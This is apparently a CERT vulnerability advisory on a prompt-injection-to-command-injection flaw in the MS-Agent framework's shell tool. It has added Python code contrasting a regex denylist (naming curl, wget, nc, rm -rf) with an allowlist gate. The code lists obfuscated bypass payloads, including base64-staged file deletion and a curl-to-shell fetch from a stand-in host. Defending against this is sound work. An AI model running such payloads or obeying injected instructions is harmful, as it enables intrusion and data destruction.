CERT Recently Published Vulnerability Notes

VU#431821: MS-Agent does not properly sanitize commands sent to its shell tool, allowing for RCE

A command injection vulnerability in the MS-Agent framework allows arbitrary operating system command execution via unsanitized prompt input. MS-Agent exposes a Shell tool that runs commands on the host; the framework does not adequately sanitize external content before it reaches that tool, so an attacker can use prompt injection to steer the agent into running unintended shell commands.

The Shell tool tries to block unsafe commands with a regular-expression denylist in its check_safe() method. Crafted input bypasses this denylist and reaches the shell execution layer. Denylist filtering is inherently weak: it can usually be circumvented by encoding or obfuscating the command so that the pattern no longer matches while the shell still interprets it as intended.

Tracked as CVE-2026-2256, the flaw is exploitable whenever the agent processes or retrieves attacker-controlled content containing malicious command sequences. Successful exploitation executes commands with the privileges of the MS-Agent process, which could lead to system file modification, lateral movement, persistence, or data exfiltration.

No vendor patch or statement was provided during coordination. Deploy MS-Agent only in trusted environments with validated input; run agents that have shell execution sandboxed and with least-privilege permissions; replace denylists with strict allowlists; and improve isolation for tool execution.
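The two designs the note contrasts, as an added example in Python (the language MS-Agent is written in). This is illustrative code written for this page, not MS-Agent's check_safe() or its real patterns: a regex denylist of the kind described, constructed encoding and obfuscation payloads that slip past it, and an allowlist gate that parses argv once with shlex, refuses shell metacharacters and relative-path escapes, and executes without a shell. The denylisted patterns, the allowed binaries, the /tmp/victim target and the localhost/payload URL are all assumptions chosen for illustration.

```python
import base64
import re
import shlex
import subprocess

# --- 1. Denylist gate, modelled on the regex-denylist approach the note describes.
# These patterns are assumptions for illustration, not MS-Agent's real check_safe().
DENY_PATTERNS = [
    r"\brm\s+-rf\b",
    r"\bcurl\b",
    r"\bwget\b",
    r"\bnc\b",
    r"\bchmod\b",
]
_DENY_RE = re.compile("|".join(DENY_PATTERNS))


def denylist_check_safe(command: str) -> bool:
    """Permit anything the denylist regexes fail to match (the weak design)."""
    return _DENY_RE.search(command) is None


# Constructed payloads using the encoding/obfuscation tricks the note mentions.
# Each still runs `rm -rf /tmp/victim` (or fetches a stage) once a shell parses it,
# but none contains a substring the regexes above recognise.
BYPASS_PAYLOADS = {
    # Empty quotes split the token the regex looks for; the shell concatenates them.
    "quote splitting": 'r""m -rf /tmp/victim',
    # ${IFS} expands to whitespace in the shell, so the literal text has no \s for \s+.
    "IFS substitution": "rm${IFS}-rf${IFS}/tmp/victim",
    # The payload only exists as base64 until a second shell decodes and runs it.
    "base64 staging": "echo "
    + base64.b64encode(b"rm -rf /tmp/victim").decode()
    + " | base64 -d | sh",
    # The blocked word is assembled from a variable plus a suffix at runtime.
    "variable assembly": "c=cur; ${c}l localhost/payload | sh",
}


def denylist_bypasses() -> dict:
    """Map payload name -> True if the denylist gate lets it through."""
    return {name: denylist_check_safe(p) for name, p in BYPASS_PAYLOADS.items()}


# --- 2. Allowlist gate: fixed binaries, argv parsed once, no shell involved.
ALLOWED_BINARIES = {"ls", "cat", "grep", "head", "wc"}
# Any of these lets a shell reinterpret the command line; reject outright.
_SHELL_META = set(";&|`$<>(){}\n\\")
# Arguments: flags, relative file names, simple words. Spaces inside quoted
# arguments do not survive this pattern unless it is deliberately relaxed.
_ARG_RE = re.compile(r"^[\w./-]+$")


def allowlist_check_safe(command: str) -> bool:
    """Permit only a known binary with plain, relative arguments."""
    if any(ch in _SHELL_META for ch in command):
        return False
    try:
        argv = shlex.split(command)  # resolves quoting, so r""m becomes rm
    except ValueError:  # unbalanced quotes
        return False
    if not argv or argv[0] not in ALLOWED_BINARIES:
        return False
    for arg in argv[1:]:
        if not _ARG_RE.match(arg) or arg.startswith("/") or ".." in arg.split("/"):
            return False
    return True


def run_allowlisted(command: str, cwd: str, timeout: int = 10) -> subprocess.CompletedProcess:
    """Execute an allowlisted command with shell=False so argv reaches execve unparsed."""
    if not allowlist_check_safe(command):
        raise PermissionError(f"command rejected by allowlist: {command!r}")
    return subprocess.run(
        shlex.split(command), cwd=cwd, shell=False,
        capture_output=True, text=True, timeout=timeout,
    )


if __name__ == "__main__":
    for name, passed in denylist_bypasses().items():
        print(f"denylist lets through {name!r}: {passed}")
    for name, payload in BYPASS_PAYLOADS.items():
        print(f"allowlist permits {name!r}: {allowlist_check_safe(payload)}")
    print("allowlist permits 'ls -la src':", allowlist_check_safe("ls -la src"))
```

The allowlist gate is only the first of the note's recommendations: even a permitted `cat` still runs with the agent's privileges, so the tool should additionally be confined (a dedicated low-privilege user, a restricted working directory, a container or seccomp profile) so that a gap in the parser does not become a gap in the host.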
kb.cert.org